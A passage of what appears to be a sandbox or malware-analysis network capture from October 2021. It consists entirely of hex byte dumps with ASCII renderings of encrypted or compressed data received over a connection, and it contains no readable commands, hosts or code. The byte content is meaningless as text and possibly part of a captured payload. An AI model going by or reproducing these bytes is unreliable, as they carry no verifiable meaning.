de 33 05 92 58 6b fd 0e 0b 18 5b cb b0 9b
                                                                          Data Ascii: W*=<#@`6i06E)#f]J%,10~N9ZRR_NYh .E}\,ba4U<5)V/Ab+0BBG"o-eT;e5J BgP<>G :tfy,d@O.5kK3Xk[
                                                                          2021-10-13 14:18:11 UTC118INData Raw: 6d 35 ab eb 6b 36 d7 c9 99 1a 95 62 33 35 72 e5 d5 db f5 b9 89 b6 e2 a3 51 75 65 e0 d4 ef 9c 67 b6 39 52 fe 4e fe 3e bd 5c 5b 63 29 8c 88 58 72 8e 3d 8f ca 6d cf 5d ca 49 a2 34 e7 88 35 b0 78 a8 c8 5b 24 5e 15 23 ba ec f1 03 9a 7b 89 41 e3 58 77 ed 56 69 c9 f4 44 1b 38 fa 45 7f 19 e4 5b 5a a0 12 2f a3 a9 6e 88 a2 51 76 e3 e6 17 e7 2f 3c b0 44 e1 df 4e 06 37 80 e4 ee be cf ec 5e 0b bc 13 66 8d 45 5b 89 fb 69 24 6e 96 37 3e e0 8d db 36 68 c8 80 16 5a 4f 14 99 48 67 62 6f 36 2e 4c 50 76 0e 20 98 c1 ac 87 e4 4a 61 80 2e 88 07 22 e5 a1 57 15 8c 2a b4 ef 79 c8 75 6f 30 21 d4 d9 b8 e1 cf 78 fe f0 b4 69 f2 9d a6 ef d1 fd 09 93 5d 6c 83 6c 88 26 cd ff 56 95 ea 97 61 c6 c9 96 e9 77 75 e5 41 18 be db 2e bc 84 4e 9a 03 89 8f e3 cb a0 6c b6 35 f3 ca f3 f6 80 6f 39 44
                                                                          Data Ascii: m5k6b35rQueg9RN>\[c)Xr=m]I45x[$^#{AXwViD8E[Z/nQv/<DN7^fE[i$n7>6hZOHgbo6.LPv Ja."W*yuo0!xi]ll&VawuA.Nl5o9D
                                                                          2021-10-13 14:18:11 UTC119INData Raw: 99 27 3b c6 c5 da 55 bc 69 b5 21 21 ec 32 a1 d7 c8 c5 84 df 9b 74 94 de 6d f5 27 9b d3 27 9f 61 4c 47 9d 26 cc 19 d4 72 20 c4 31 14 8d 93 47 44 8e b3 27 5a ed c6 e2 e5 5a d5 5d 22 b6 6d 33 82 1d a4 0b e2 e7 e9 69 54 bc 9e aa ab 0a fa 6b fc c7 cf 9e 66 ff 1a 93 4d 1c 19 ae 7d 8b c6 20 f6 a5 7c cf fa 22 22 50 08 35 29 55 43 e2 33 bc 25 e5 df 5b ad 1b 73 2c 37 a7 bf 53 9e 09 ce 7c 54 1a a8 88 68 ca 43 bd 31 d4 5e f9 45 ff 37 fc 3a d2 d9 24 e0 60 09 83 75 07 4e f0 87 4b cf 57 6a c9 32 12 11 8b 54 7a 67 61 72 b8 eb ce b1 f0 82 68 b0 70 7e a0 57 06 0d ec 14 5d f2 d8 c2 9c c7 09 43 b2 e7 00 c2 12 9c 26 f9 07 13 3d a0 31 af 35 ac 0a be 51 7a 06 11 39 a8 10 c9 1f da ec 2f 38 7a 4f cb cb 36 c3 e4 06 25 8c 86 67 f5 39 08 f6 a9 15 da 07 36 07 2d fc ec 81 42 40 ee ed
                                                                          Data Ascii: ';Ui!!2tm''aLG&r 1GD'ZZ]"m3iTkfM} |""P5)UC3%[s,7S|ThC1^E7:$`uNKWj2Tzgarhp~W]C&=15Qz9/8zO6%g96-B@
                                                                          2021-10-13 14:18:11 UTC120INData Raw: 47 8c 90 3a 41 79 6f 76 c0 fc c9 99 70 42 2b 6c e9 5c c5 03 bd 4d 54 a6 35 8f a4 56 72 c9 d3 8a ca 61 ff 24 dc 67 b2 05 c5 8d 35 ab 44 77 34 5a 08 4b 8f 1b bf ec e1 15 9b 87 a0 4a e4 73 73 ee c9 6b a6 37 37 e8 33 96 60 6c 0d f5 4f 35 51 13 6f fe e5 88 8a a2 5b 65 c6 2e 26 bf 07 ad a2 61 c3 8f 5b d0 b0 27 ce ee bf df e9 45 94 17 10 94 b6 45 56 a4 cf e6 2a 76 4e 2e 45 1b 99 f3 9f 64 cf 83 36 52 49 16 9f 5e 67 68 6f 36 2e 75 af 60 26 02 00 c8 bd 47 64 44 70 84 1e 45 14 1c cd 11 67 16 86 bd 9d ea 79 32 63 47 c9 35 c7 d6 a8 a3 cd 78 f4 e1 b9 78 c5 bc 5c ee fb e0 8d 85 59 e2 35 4a 90 2d ef 4f 53 95 f1 ba 57 3d c8 bc f7 4e 99 ee d0 1e 8b 21 29 bc 9f 63 39 fd 88 a9 ca fd 6a 6c b1 18 74 d8 f6 e7 68 e3 12 47 45 6b e7 eb 9f e5 74 b9 e0 79 9f f2 15 32 f5 b8 cc dc d6
                                                                          Data Ascii: G:AyovpB+l\MT5Vra$g5Dw4ZKJssk773`lO5Qo[e.&a['EEV*vN.Ed6RI^gho6.u`&GdDpEgy2cG5xx\Y5J-OSW=N!)c9jlthGEkty2
                                                                          2021-10-13 14:18:11 UTC121INData Raw: d3 8f b3 80 c0 5a 32 30 8c d5 21 05 79 52 b9 9d 19 fc 19 c7 0b f4 e0 34 12 9d 5e 84 58 9a ad 5c 8e 4f c6 e4 f8 24 00 4b 0a 53 06 cf 85 0a 2f 1b 8d 35 ea 7a 41 c2 7f bd 83 2a ec 64 e5 7a cd 96 72 fa 19 a4 e4 e2 18 88 4f a7 c1 08 d7 88 c4 c9 d2 0c 1b 9d 03 1d 18 5c 57 c0 c9 84 27 e3 c8 c9 a1 08 64 2d 35 90 b1 65 76 1e 6e 4f 5c 32 26 2b 79 e0 7a 22 3a eb ee ee 45 e4 34 c9 07 d0 f5 24 e1 fe 1a 9d 66 11 5d c0 81 75 d0 bf e7 da 39 03 05 38 51 c1 60 70 79 9a 5b d9 b1 eb 81 5f 7f 8d 7f 8a 49 b3 f8 ed 14 5c fe f7 c0 a9 d1 0f d8 92 ea fe c2 9c 9a 15 e8 3b 2c 10 03 37 87 1b b8 22 77 7a ef 00 06 be bc 18 d6 10 da d8 3e 0a 7b 46 53 0a 37 ef c4 b5 3d be 98 64 37 7e 47 f4 a9 15 a1 a8 f3 04 27 e2 95 84 44 40 e4 83 3c bb 0d 71 14 5e ab 3a d8 d5 dd d6 80 58 7f 5e aa 8f 5e
                                                                          Data Ascii: Z20!yR4^X\O$KS/5zA*dzrO\W'd-5evnO\2&+yz":E4$f]u98Q`py[_I\;,7"wz>{FS7=d7~G'D@<q^:X^^
                                                                          2021-10-13 14:18:11 UTC123INData Raw: 54 6f 4f 5e 71 b8 71 a5 56 76 f9 9b 5d c8 67 dd 6f 22 66 b8 2b e7 83 24 af 03 f2 37 5a 0c 4c 0d 18 a3 ee e0 00 93 8e fb 4f e3 73 73 d5 fd 7a b6 35 2b 33 30 96 60 6e 09 f5 57 72 8d 17 6f fe a2 40 8a a2 57 5e 08 14 28 b4 68 89 b2 44 ed 79 49 c1 b1 83 c9 eb bf c2 d2 77 87 0b 02 94 75 43 56 a8 b6 4d 2f 76 48 3e 41 0c e2 f1 3e 64 c9 8f 0f 6a 23 01 98 48 45 5e 62 13 0c 53 b3 74 04 39 10 e0 83 51 e9 49 ae 84 0e 5b 17 de f6 b8 76 1c 9d 82 8a 9a 87 cb 8a 7e 34 20 11 cf 95 5b da 69 e8 7e 12 53 06 69 a7 11 fb dc 00 c3 6d e2 34 5e 84 39 c7 bf 53 95 fb 99 7d 38 c8 e4 e1 66 71 fe d0 14 a3 d2 2b bc 94 4b 81 fd 88 3e e6 e0 7b 1d a4 30 f3 d1 f4 e1 7e 61 15 47 45 70 f3 ff 8a d6 e7 b0 e0 29 b6 6e 15 37 fe ab c7 cf c0 e9 87 0f 0c cd d2 09 7f df f8 25 6a fa 98 17 b8 e0 e4 50
                                                                          Data Ascii: ToO^qqVv]go"f+$7ZLOssz5+30`nWro@W^(hDyIwuCVM/vH>A>dj#HE^bSt9QI[v~4 [i~Sim4^9S}8fq+K>{0~aGEp)n7%jP
                                                                          2021-10-13 14:18:11 UTC124INData Raw: 34 71 44 e1 34 16 89 32 2b 21 9b a7 37 70 4a bb 9e ee 4b d6 63 0a 4a 59 37 84 e0 29 0c e2 ef e9 7a 5a af 7f a9 ce 2c ff 69 f8 1b eb 81 72 ef 73 c5 ef 1c 1d a6 85 fb c4 20 fe a5 d0 cf fa 22 33 9d 08 35 23 21 2a cb f0 bb 26 f7 36 d7 bc e5 72 27 22 ab 83 71 8b 91 f5 3e d4 1b a9 2e 7b e8 2c 29 24 fc f9 d1 1d f7 23 de 84 ae d8 22 f3 ee 18 81 0e 79 5c d1 92 68 a2 c1 e7 f6 36 3a fd 2b 45 51 77 61 98 91 5e 30 b0 f1 91 6c 5e 71 7a 28 f7 f6 88 ed 14 58 e3 f8 a8 3c d0 1e cb a5 bf 02 c3 ba f0 85 ec 13 03 11 15 33 d4 be b9 22 79 50 01 82 07 b4 ab 38 24 1c c9 c5 3b 0f 92 58 51 0a 37 cf ed 88 73 ad 97 fd 56 6c 2f f7 a9 1b cc 2d 89 80 2c fa fe 24 1d 42 ee e6 c8 39 0c 7b 03 5f a2 2d b0 41 dc c7 93 41 fa db 87 86 24 f2 19 4d 44 00 24 3c 94 b5 4b 90 20 e3 4d b7 fd 57 20 82
                                                                          Data Ascii: 4qD42+!7pJKcJY7)zZ,irs "35#!*&6r'"q>.{,)$#"y\h6:+EQwa^0l^qz(X<3"yP8$;XQ7sVl/-,$B9{_-AA$MD$<K MW
                                                                          2021-10-13 14:18:11 UTC125INData Raw: be 07 a2 f3 ac a0 7d ba 2d c0 2d 70 08 16 a4 f3 cc 1c a8 a8 8a 6d e7 59 2f b8 74 6a a6 39 58 81 17 bb 6d 59 05 fb 6b 45 ac 3a 42 fa 8a 68 a2 f8 2f ef e2 16 2c a3 9d 88 9d 4f cd 75 46 ec a5 a4 cc c3 bd c4 fc 73 df 75 9d bd 9e 45 48 38 fc 46 26 50 50 30 1a 10 80 f3 11 66 cf 8f 34 18 32 8f 98 48 4b 9f 64 ac 01 49 bf 52 11 23 1b 90 a4 5d c1 6e 72 84 19 7b 62 76 7c b3 67 12 93 9f 2e ca 54 38 53 70 2b 28 a3 c3 8b 62 e2 7a fe f6 8f 32 93 0d 59 ee f9 e9 0b 18 7c cf 3f 78 9b 32 d8 83 4a bd d6 90 7d 3e e2 d8 9f ff 70 ec d4 0b af 52 0e 91 99 6d 9e f1 97 d1 f9 fc 53 5d a7 30 f5 f1 98 9f e7 6f 15 43 5a 67 69 da a6 c2 f1 a6 ed 53 39 6e 15 32 e0 a1 fe e0 c8 eb 97 4a 83 b2 4b 02 60 84 d4 23 f2 c8 da 10 9f ff e0 7a c6 a2 0d b8 e8 9f 21 34 fe 01 09 ab b8 c6 a3 ec 7c 9d b1
                                                                          Data Ascii: }--pmY/tj9XmYkE:Bh/,OuFsuEH8F&PP0f42HKdIR#]nr{bv|g.T8Sp+(bz2Y|?x2J}>pRmS]0oCZgiS9n2JK`#z!4|
                                                                          2021-10-13 14:18:11 UTC127INData Raw: e7 69 8e 5b 69 33 9a 22 04 0e e2 e1 c2 10 35 34 80 bc 87 33 c9 f1 df 48 d0 a7 6d dd 2e 37 ec 1c 19 bc 7d 9b c6 20 fa a7 ae b1 63 29 1b 99 16 02 b3 79 7a c4 d6 a0 12 c3 46 d4 aa 1b 6a 05 09 85 ae 75 a2 75 3c da 55 1a ad 35 41 70 72 84 2b da e2 c1 65 64 21 d4 f9 ca f1 0f f5 ed 08 a9 1f 78 c4 d0 96 6e c6 78 7c d3 1f 1c 36 36 7c 7b e5 77 66 90 54 e6 9c f8 96 46 59 19 00 3f 41 8b 0e f3 2e c6 c4 d7 dd 98 ce 24 ef 11 e5 00 c3 ad a5 29 ef 13 01 3f 69 4f 36 3e b8 26 62 69 e0 25 2b ba 89 0f f2 3e 6a cd 3e 1b 75 71 6a f6 36 c5 cf ca 4a 36 93 73 e5 0e 97 6c 8c 32 c1 09 ed 38 0d 5c f8 0c 45 5f e7 c4 98 b8 0d 7d 2d 30 ca b6 ca c2 d9 d8 aa d9 a4 72 88 a0 3f e7 d4 e0 46 0a 26 2e 32 2f 34 16 27 c9 23 cb 66 2d a6 87 7a 5a f3 03 1a be 13 00 39 0b 75 4f e4 fa ac 97 f8 d8 4c
                                                                          Data Ascii: i[i3"543Hm.7} c)yzFjuu<U5Apr+ed!xnx|66|{wfTFY?A.$)?iO6>&bi%+>j>uqj6J6sl28\E_}-0r?F&.2/4'#f-zZ9uOL
                                                                          2021-10-13 14:18:11 UTC128INData Raw: 87 88 6b cb 19 0b 5f ec 6b a2 22 21 81 17 bb 68 59 06 81 7b ce a4 12 6f e4 a2 43 8a a2 57 5c 8d 68 b1 bf 07 a9 af 22 71 4d 74 df 9c b4 82 ce 25 c0 fa 59 9a 1b 2c 91 9c 41 50 88 b3 15 b4 77 4e 2b 4e 68 17 fe 11 6a e9 96 79 5a e6 12 99 48 54 a8 40 34 24 62 99 1a 70 b3 05 c8 bf 4e 81 d9 55 a9 10 77 1f 60 c5 1d 63 16 8c 8a bb c7 54 36 75 69 0b 5d b9 45 81 4a cb 67 97 6a 80 41 e3 b2 47 87 dd 48 04 82 59 f9 1c 73 86 39 c1 c6 3d eb 62 93 7d 3c d7 d0 7b 43 5c e3 f6 0b c9 e8 e8 b8 95 4b 9e d8 a0 8e e4 e0 7d 5a cb 4e 6a da f6 e5 61 05 8f 62 68 65 d5 e0 e0 ed 3f bd e0 73 a8 65 3d 1f fd ab d0 e7 a4 95 08 61 ed c8 cd 6f fa a5 e6 22 4e f2 9b 3f 4a e4 ee 5a 41 b7 25 95 f5 95 0f 33 96 7f 96 80 d6 bc 25 80 e6 bc 83 ae 4c 6e d4 7e 93 ef 63 0f 59 f2 72 d7 45 69 24 7d 61 2e
                                                                          Data Ascii: k_k"!hY{oCW\h"qMt%Y,APwN+NhjyZHT@4$bpNUw`cT6ui]EJgjAGHYs9=b}<{C\K}ZNjabhe?se=ao"N?JZA%3%Ln~cYrEi$}a.
                                                                          2021-10-13 14:18:11 UTC129INData Raw: 3d d9 4b 6a 65 de 81 52 9e 09 bb ee 06 31 89 57 b6 c2 0a 7e f3 5d ce fa 2c 3b 0c 09 35 29 c6 72 e7 e1 99 05 72 c8 d6 aa 3b 0a 2a 24 87 b4 5b a5 1d 42 45 7e 98 d7 b3 78 ea 53 89 b7 fc fd f9 df d0 0e c5 df f1 4b 22 f7 ed 2e fe 72 06 5d c9 be 47 db 41 e0 dc b0 6c 89 28 45 5f 53 e6 66 90 48 54 94 d7 87 66 53 e0 7e a6 40 ab 75 eb 14 5c fc d2 fe bc d1 18 e5 0f 99 99 c2 b0 89 24 79 13 07 15 99 14 82 2e 9e 02 e9 52 7a 00 26 32 a8 10 c9 00 e1 e2 3c 1b 6a 73 c5 8a af c2 e5 a0 14 3a 92 73 e1 8b 8e db b8 39 ee ba f2 04 2d da 74 0b 45 40 f9 c4 98 b8 0d 7d 2d d8 ca b6 ca c2 d9 e7 01 43 81 5f 1c a3 0d cb d2 6f d2 0a 26 39 3a 8d 31 16 21 f4 61 98 fd 2c a0 a9 e7 1a f0 27 37 b4 15 88 07 2b c5 d7 c1 d7 aa 99 f5 4d 4c ef 96 ed ec 65 d4 ef 21 ea d0 b1 ae 71 74 df 53 f2 94 bd
                                                                          Data Ascii: =KjeR1W~],;5)rr;*$[BE~xSK".r]GAl(E_SfHTfS~@u\$y.Rz&2<js:s9-tE@}-C_o&9:1!a,'7+MLe!qtS
                                                                          2021-10-13 14:18:11 UTC130INData Raw: 4a 7c 80 a5 6f f8 8a 4e 36 aa 51 76 f4 3e 05 bc 07 ab 9a c6 95 f1 58 d0 be 8b 5c ee bf c4 60 7c a8 1a 22 9c 26 41 56 a2 f9 d4 25 76 4e 35 79 22 8f db 3a 4e 4d f7 87 7b 4c 12 b9 f1 4f 80 6d ac 01 49 a2 52 2e 93 04 c8 bb 71 2a 4b 70 84 08 79 2d 0a e5 b4 4d 94 f2 0c b5 ef 7d 14 cf 6f 21 37 5d f9 ad 5b e9 58 44 f0 a5 6c cd 50 50 ee fd ec 28 af 5b e2 32 74 06 47 5e ed 53 91 db 29 7d 38 c8 20 c4 4b 60 ca f0 af a3 c8 2b 9c 5d 43 81 fd 94 8b cb e2 7b 76 8f b6 8d 42 f7 e1 7a 4e a9 47 45 6a 69 da a6 df f1 99 5c 73 b7 6e 35 fc f7 ab d6 d2 c7 c3 bc 62 ed ca f8 85 1e 19 ca 2d 6c cd 4a 1f b9 e0 74 7f 73 b0 2b 98 4a 95 09 19 dc da 07 81 d6 a7 21 c5 51 9b ae a6 40 f3 c7 c7 9a ea 67 2f fb da 5f d5 df 4a 23 02 39 97 65 9c b8 d4 3a ad df 37 da f3 34 e5 2e df 8c b4 35 ae 2d
                                                                          Data Ascii: J|oN6Qv>X\`|"&AV%vN5y":NM{LOmIR.q*Kpy-M}o!7][XDlPP([2tG^S)}8 K`+]C{vBzNGEji\sn5b-lJts+J!Q@g/_J#9e:74.5-
                                                                          2021-10-13 14:18:11 UTC132INData Raw: 7a f3 5d ce fa 2c 3b 43 09 35 29 c6 72 e7 e2 99 05 3d c8 d6 aa 3b 94 21 24 87 b1 52 a0 32 40 43 52 30 2f 54 e0 eb 57 ad 05 23 fd f9 45 6f 06 f9 eb f7 f9 fd f7 ed 0e a3 7d 0b 5d d1 89 48 f1 6c e4 f6 34 38 96 57 dc 5a 73 71 46 70 48 ce b1 60 b3 6d 61 55 5e 46 40 8b 0a cc 3e 51 e1 fa cc 9c f9 33 cd 8d e1 2a 45 ce 14 05 ed 17 27 f4 03 31 af a5 9d 0f 6f 74 5a e1 06 b4 af 30 85 13 c9 cf 21 39 44 74 45 f4 30 e9 67 da ad ae 92 77 c1 f3 ab f6 a9 85 eb 02 e3 22 0d 18 fa 0c 45 60 80 e1 b5 ba 10 53 2a 58 b4 29 e1 44 a3 5e 96 43 85 7f 65 86 20 da 6e 6a 69 18 00 19 f9 02 36 16 01 96 44 b5 ff 33 85 ab 48 66 69 20 1d 36 4b 86 06 2b c1 6d 00 fa bb bf 4f ff 61 fd b0 ed 98 62 d4 ef 1b 5a f0 b3 ae 68 55 75 00 69 95 bb 60 40 0c 8a d3 b6 30 7a e5 87 a8 23 69 96 1a f2 b8 1a d6
                                                                          Data Ascii: z],;C5)r=;!$R2@CR0/TW#Eo}]Hl48WZsqFpH`maU^F@>Q3*E'1otZ0!9DtE0gw"E`S*X)D^Ce nji6D3Hfi 6K+mOabZhUui`@0z#i
                                                                          2021-10-13 14:18:11 UTC133INData Raw: dd ea 68 5d f0 bf aa e4 ee 25 e1 d7 48 a3 2b 01 bd 9e 41 76 a0 d6 6b 2d 6b 66 02 53 0f 8b f1 be 1a 56 88 1e 7e 6c 10 98 48 4f 1a 48 1b 35 42 93 72 0f 2a 04 e8 b2 5e e9 43 6b ac 32 53 00 0e cf 30 19 8f 8d 95 b0 cf 7e 35 75 6f bb 12 ea cd a6 6a c8 79 fe f0 85 62 e2 94 58 f2 d5 db 02 82 5f c8 b2 20 1d 38 c7 e8 73 9d fa 92 7d a2 ed 97 f3 40 51 e4 d1 14 a3 e8 3f b3 95 4b 9e e5 a0 8e e4 e0 7d 5a 23 4e 6a da f6 e5 5e 67 14 47 45 f0 d6 d2 99 eb f7 b0 e1 73 b7 4e 39 3d ff ab c9 d6 e2 c6 93 60 eb e6 50 7d f9 81 cb 29 48 e7 f6 1f b9 7a cb 77 4f 84 2d b2 f6 95 09 39 bb 0e 0f 81 ca 90 17 ef 7c 9f 84 26 14 e8 b8 5e 9f ca 68 0e 45 da c5 f0 68 7d 28 33 14 b6 db 9c 98 99 15 5b d7 28 d1 c1 31 ca 2c d9 a0 18 cd 49 b5 62 63 a1 17 95 5a 73 26 83 ec b9 73 65 89 4d c6 e3 02 66
                                                                          Data Ascii: h]%H+Avk-kfSV~lHOH5Br*^Ck2S0~5uojybX_ 8s}@Q?K}Z#Nj^gGEsN9=`P})HzwO-9|&^hEh}(3[(1,IbcZs&seMf
                                                                          2021-10-13 14:18:11 UTC134INData Raw: df 82 36 71 2d 22 ad 28 0d 11 1e 42 47 74 36 a8 2a 79 70 72 84 37 da dd d5 44 f5 23 f4 19 c1 d9 22 e8 cd 26 ae 77 06 5b fb 14 14 40 40 e6 f2 12 3f 11 29 45 c1 56 58 77 b6 68 e3 b0 fa 96 60 73 62 7e a6 5e a3 27 ee 14 5a cb 7c ad 27 d0 1e cb ad c9 01 c3 b0 17 21 c0 01 21 35 2d 30 af 3f 98 2a 6c 52 7a 1f 11 9c 82 12 c9 18 e3 49 40 82 6d 59 43 d4 19 c2 e5 a4 ae 8a bf 61 c7 31 84 f7 a9 1f ee 30 e3 04 2d e5 ec 24 68 42 ee ea 9f 3c 73 e2 06 5a b0 0f fb c3 dd c7 0d 66 ac 4d a0 a6 10 db f4 4f 64 3f 37 39 1a 1d 3a 3e 0c e1 49 b3 d5 aa d8 1a 64 64 6d 06 06 b1 35 1f 9d 0e e8 5f c2 da 8a be d5 da 6c ae 87 cd 7c 7d dd c7 16 c0 fd b5 84 f5 20 c4 2c 6b 91 9d 78 c7 72 13 48 93 19 4b 26 a7 9a 22 f3 b3 17 aa 8f 3a 33 11 bb c8 9a ee 89 a2 9b fa 7f b7 aa fc 8e b9 02 45 af b2
                                                                          Data Ascii: 6q-"(BGt6*ypr7D#"&w[@@?)EVXwh`sb~^'Z|'!!5-0?*lRzI@mYCa10-$hB<sZfMOd?79:>Iddm5_l|} ,kxrHK&":3E
                                                                          2021-10-13 14:18:11 UTC135INData Raw: 73 8f c8 4d 0d 24 4f 2f 51 2f 9d cf 3c 64 d1 a1 33 78 4c 10 b3 ce 31 19 6c 36 20 44 e0 75 0e 2a 9e ed 96 43 cf 63 23 85 1f 51 20 10 f1 b2 67 09 9c bd 99 ed 79 32 5f e9 5f ae c6 dc 84 6a 9b 79 fe f0 3f 49 c0 86 7e ce a9 f7 00 82 79 ca 20 5e 84 26 d7 c4 7e 97 fb 94 57 be b6 23 e0 66 75 cc 85 15 a3 c8 b1 99 b8 59 a7 dd dd a2 e6 e0 5b 48 b1 30 f3 c4 fd c9 53 6c 15 41 6f ec 8d 66 8a cd d3 99 b6 72 b7 6e 8f 17 d2 b9 f0 ed 9c ea 91 60 cd 8f c6 03 60 9f de 05 45 ef f7 19 93 62 90 c3 5f a2 09 98 a0 94 09 19 66 24 22 90 f0 98 6d ec 7c 99 8e f8 7e 71 b9 43 b3 c7 61 0f 43 f0 dd ab dc 6e 0e 17 3f ef da 9c b8 4e 3f 76 c6 11 fa b1 1d c8 2c ff d5 8a b3 d0 ae 4a 4a 83 1b 92 70 f1 c2 3f c0 ab 51 65 dc 4d c6 e3 b8 1b be 9f a5 62 d4 db 56 80 e2 b2 57 d3 66 ca a5 97 2c c8 1d
                                                                          Data Ascii: sM$O/Q/<d3xL1l6 Du*Cc#Q gy2__jy?I~y ^&~W#fuY[H0SlAofrn``Eb_f$"m|~qCaCn?N?v,JJp?QeMbVWf,
                                                                          2021-10-13 14:18:11 UTC137INData Raw: 57 ad 05 85 fc f9 45 6f 06 f9 e8 f7 f9 5b f6 ed 0e a3 2d 10 5d d1 8a 42 f4 43 e6 f0 18 94 6e b0 44 5b 77 55 1c 91 48 ce 2b df bb 52 55 53 04 a7 40 8b 2a b2 02 5c e1 e5 c2 96 fc 1c cf 8b cd 86 bd 29 8c 04 e9 33 7c 14 03 31 35 1a 95 30 5b 72 01 01 06 b4 8f 7f df 1e c9 d0 20 33 41 5b 47 f2 1c 45 9b 3d 35 af 96 53 9d 10 ab f6 33 3a e3 3d d4 24 51 fb fa 0c 65 cd f8 ec b5 a5 03 53 2a 58 b4 29 e1 40 a3 5e 96 43 85 7f fb 87 20 da 6e 6a 69 1b 00 19 67 03 36 16 01 78 5f b5 ff 32 8e ae 67 64 6f 0c b1 ce ac 1e 07 2f e5 33 e5 fa bb 25 f0 f7 5e c9 b6 b3 7d 62 d4 cf 98 d4 fd b3 b1 79 76 70 2f 6b 93 97 cc b8 eb 12 d2 b2 14 25 01 87 a8 b9 d6 9e 25 c6 be 45 32 0c 93 c5 29 f8 8f 88 02 98 ce 9b a8 f8 a8 a0 85 3b 36 29 70 25 23 19 df 60 5c 9a dc e1 a9 9e 5a 83 ee 25 a8 bb be
                                                                          Data Ascii: WEo[-]BCnD[wUH+RUS@*\)3|150[r 3A[GE=5S3:=$QeS*X)@^C njig6x_2gdo/3%^}byvp/k%%E2);6)p%#`\Z%
                                                                          2021-10-13 14:18:11 UTC138INData Raw: 3b 9b 48 49 aa ef 48 bd 65 b3 70 2e 8a 05 c8 bb cb cc 6e 61 a2 3f f1 01 08 e5 92 3e 0e 8c 95 aa c7 54 36 75 69 0b b1 b9 45 81 4a cb 58 5f f1 a5 6c 77 b1 75 fc db d6 a1 83 59 e2 14 3f 9c 39 c7 f3 42 bd d6 90 7d 3e e2 38 9f ff 70 ec d4 34 01 c9 2b bc 0f 6e ac ec ae 83 44 e1 7b 70 85 42 eb db f6 fd 56 43 17 47 43 40 75 81 12 cc d7 bd c0 d0 b6 6e 15 a8 da 86 c4 eb ea 48 90 60 ed ec aa 1b 60 80 d4 20 40 c0 f5 1f bf ca 68 24 c7 a3 0d bc d7 31 08 19 fc 9b 2a ac c4 9e 1a 49 7d 99 ae 80 ef 69 b9 5e 84 e4 4b 22 47 da 59 ff c3 11 97 12 1f b3 fb 39 b9 d4 1a c1 f2 1a c8 cf 3c 6d 2d df 8a be 20 c8 b4 62 78 8c 33 b9 58 73 ba 8c 43 d5 cc 44 85 48 e6 45 23 3e 93 14 a6 6f 9c fc 76 26 c3 d1 43 f3 c6 c9 8d ba 34 e0 36 d0 c8 0f e5 1a 50 47 c1 cd 38 79 a1 bf 5c ed 66 f8 66 e4
                                                                          Data Ascii: ;HIHep.na?>T6uiEJX_lwuY?9B}>8p4+nD{pBVCGC@unH`` @h$1*I}i^K"GY9<m- bx3XsCDHE#>ov&C46PG8y\ff
                                                                          2021-10-13 14:18:11 UTC139INData Raw: 04 5d d7 bc e8 a7 d8 e7 f6 36 32 d7 28 45 5b e9 50 4b 81 6e ee 76 fb 96 40 53 6d 64 a6 40 97 22 c1 16 5c e7 d0 51 c0 48 1f cf 89 c7 c8 c2 b0 8d 9e c8 3e 16 33 23 f9 ae 3f b8 02 59 48 7a 00 18 9c 82 12 c9 18 e3 49 40 82 6d 59 43 d4 ff c2 e5 a4 ae 8a bf 61 c7 31 62 f7 a9 1f ee 03 e8 04 2d e5 f3 24 68 42 ee ea 9f 3c 73 e2 06 5a b0 0f 01 c3 dd c7 0d 66 ac 4d a0 a6 ea db f4 4f 64 3f 3c 39 1a 1d 22 3e 0c e1 49 b3 d5 ae d8 1a 64 64 6d 06 fc b1 35 1f 9d 0e e8 5c c2 da 70 be d5 da 6c a6 8c cd 7c 7b fc c2 39 c2 fb 99 2c 09 c7 5c 2d 6f b5 71 4b c6 72 89 f7 9b 25 7c 20 4b a9 23 f3 93 7b fa 9e 3a 28 24 be e7 98 e8 a5 0a 63 1d e7 b6 ae d8 63 8b 03 45 35 0d 5d 30 25 b9 13 61 5c 00 d9 9d a1 b8 7a 18 c7 08 aa 9b 75 a4 06 cc a0 d5 b0 5b e9 91 cf f0 86 d3 ff c7 20 c8 18 c9
                                                                          Data Ascii: ]62(E[PKnv@Smd@"\QH>3#?YHzI@mYCa1b-$hB<sZfMOd?<9">Iddm5\pl|{9,\-oqKr%| K#{:($ccE5]0%a\zu[
                                                                          2021-10-13 14:18:11 UTC141INData Raw: 6f b6 37 7c 02 08 e3 98 e1 68 15 94 b4 eb 59 da 74 6f 21 ad e2 f1 92 6c ef 96 ff f0 a5 4c c6 88 58 ee e2 fc 28 af 5b e2 32 74 02 47 5e ed 53 91 db 7d 7c 38 c8 20 c4 4b 63 ca f0 fb a2 c8 2b 9c a0 57 81 fd 97 a8 ce cd 79 70 a3 1a 71 a5 6f e0 7e 6a 35 b7 44 6a f3 65 ae e0 c6 9f c0 83 b6 6e 15 12 bf b7 d6 cd d6 c3 bc 62 ed ca f8 81 1e 19 ca 2d 6c cd 06 1e b9 e0 74 7f 73 b3 2b 98 06 94 09 19 dc 47 13 81 d6 a5 12 c0 7e 99 a8 8a e8 0f 20 5f 9b ee 43 fd 44 da 5f 4f 60 42 1f 35 3f 45 da 9c b8 f4 57 47 d7 37 c4 c1 31 ca 2c d9 a0 1c cd 49 b5 62 63 a1 e8 95 5a 73 26 83 ec ba 73 65 76 4d c6 e3 02 6b 8f 8e 83 5f a5 f7 54 80 c4 fb c5 ad ff d0 8d be 0e 3c 1a d2 c8 93 ea b5 3c f8 e0 39 3d 59 06 9e 00 f1 fc dd 54 d4 16 27 a9 f8 e2 0d 5f b4 b9 d1 94 25 0f ea a2 9b c2 b1 a1
                                                                          Data Ascii: o7|hYto!lLX([2tG^S}|8 Kc+Wypqo~j5Djenb-lts+G~ _CD_O`B5?EWG71,IbcZs&sevMk_T<<9=YT'_%
                                                                          2021-10-13 14:18:11 UTC142INData Raw: b1 d3 b1 fa 88 68 5e 71 7e a0 6a 09 74 75 15 5c e5 da c6 bc d1 1e 55 a8 ca 11 e5 90 98 06 ed 13 27 14 1d 31 af 24 90 0f 7f 52 7c 2a 80 ca 36 11 c9 1a e9 d9 3c 1b 6c c3 62 d9 24 e5 c5 b2 36 af 92 53 e7 0f ab f6 b6 5f e6 02 f0 04 2b d0 7c 72 dc 41 ee e8 95 ad 0f 7b 07 c0 91 02 d9 e4 fd d0 95 43 81 7f c0 98 20 da eb 46 6c 27 24 39 1c 28 b0 68 b8 e2 49 b1 df 34 a4 83 65 fe 4c 0b 25 96 15 07 05 2b c5 6d ab e4 bb bf ca d6 64 c2 94 cd 7a 48 56 91 a2 c3 fd b7 8e 6e 5c 5d 2d f1 b0 90 5b e0 52 0a d0 b6 34 7a 5b 99 a8 23 ea 9b 1a e2 9e 3c 19 8e ed 7c 99 ee 8b 